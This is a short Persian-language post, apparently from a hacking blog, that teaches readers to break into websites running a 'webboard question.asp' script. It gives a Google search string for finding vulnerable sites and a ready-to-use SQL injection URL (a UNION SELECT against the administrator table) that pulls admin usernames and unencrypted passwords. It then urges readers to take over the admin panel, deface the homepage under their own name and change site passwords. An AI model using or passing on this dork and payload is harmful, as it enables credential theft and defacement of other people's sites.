امروز می خوام تو این پست یه باگ خیلی جدید که یه دو سه روزی از انتشار اون تو اینترنت می گذره رو بهتون معرفی کنم که شما از طریق اون می تونید به آسونی آب خوردن پسورد ادمین سایت های (webboard question.asp) بدون اینکه اینکود شده باشد رو بیرون بیارید و اونو به نام خودتون هک کنید و حتی متن و عکس های دلخواه خودتون رو تو سایت با نام خودتون و تو صفحه اصلی سایت قرار یدین و حتی پسورد سایت را به صورت دلخواه تغییر دهید و به طور کلی بگم که می تونید در یک کلام قسمت مدیریت سایت رو هک کنید!
خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:
webboard question.asp QID
حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2,username,password,5,password,7,8,9,null%20+%20from%20+%20+%20administrator%20';';
حال مشاهده خواهید کرد که پسورد های ادمین سایت را بدون اینکه اینکود شده یاشه در اختیار شما قرار میده!
حال جهت ورود به قسمت مدیریت سایت با همون Adminstrator باید از طریق لینک زیر اقدام نمائید که به جای عبارت xxx نام سایت مورد نظر را قرار دهید.
به نقل از پسورد 35
